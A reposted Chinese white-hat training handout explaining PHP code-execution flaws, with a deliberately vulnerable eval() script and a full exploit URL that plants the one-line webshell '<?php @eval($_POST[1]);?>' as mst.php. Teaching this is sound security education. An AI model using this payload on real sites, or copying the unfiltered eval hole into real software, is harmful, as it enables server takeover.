转载

米斯特白帽培训讲义漏洞篇代码执行

讲师： gh0stkey

整理：飞龙

协议： CC BY-NC-SA 4.0

原理

由于开发人员编写源码时，没有针对代码中可执行的特殊函数入口做过滤，导致客户端可以提交恶意构造语句，并交由服务端执行。命令注入攻击中，Web 服务器没有过滤类似 system 、 eval 和 exec 等函数，是该漏洞攻击成功的主要原因。

实例代码

<?php
// code-exe.php:
$code=@$_GET['code'];//http://localhost/subject/code-exe.php?code=
echo "<center>Payload:".$code."<br/>Result:</center>
eval($code);

整个代码就三行，第一行用于从 URL 参数中读取 code 参数的值。第二行用于输出该参数的值，用于检查该参数。第三行直接将该参数当做 PHP 代码执行。由于不存在任何过滤，就会产生代码执行漏洞。

我们在该文件的目录下执行 php -S 0.0.0.0:80 ，之后访问 http://localhost/code-exe.php?code=phpinfo(); ，我们可以看到该代码执行了 phpinfo 函数：

米斯特白帽培训讲义漏洞篇代码执行

利用

我们可以将 URL 中 code 参数值换成不同的 PHP 代码，使其执行不同的 PHP 代码。利用此漏洞的关键还是熟悉所有可用的 PHP 代码。

比如，可以使用 phpinfo 或者 echo 等调试函数来判定漏洞。最重要的是，可以利用这个漏洞写入 Webshell，代码如下：

$file='mst.php'; // 一句话木马的文件名
$person='<?php @eval($_POST[1]);?>'; // 一句话文件名的代码
file_put_contents($file,$person, FILE_APPEND | LOCK_EX); // 当key.php文件不存在会自动创建，如果存在就会添加

我们需要把这三行代码写入 URL 中，得到的 URL 是这样： http://localhost/code-exe.php?code=$file='mst.php';$person='<?php @eval($_POST[1]);?>';file_put_contents($file,$person, FILE_APPEND | LOCK_EX); 。

访问之后，当前目录就会多出一个 mst.php ，内容为 <?php @eval($_POST[1]);?> ，这个就是一句话木马。由于不是讲工具的章节，这里就不拿菜刀演示了。

在实际代码中，当然不可能这么短，就需要大家使用 eval 和 exec 作为关键词来搜索可能的漏洞点。另外，实际代码中还可能在执行之前对 $code 进行过滤，也需要大家发挥创造性，绕过过滤来成功利用它。

原文 https://github.com/wizardforcel/mst-sec-lecture-notes/blob/master/漏洞篇代码执行.md

正文到此结束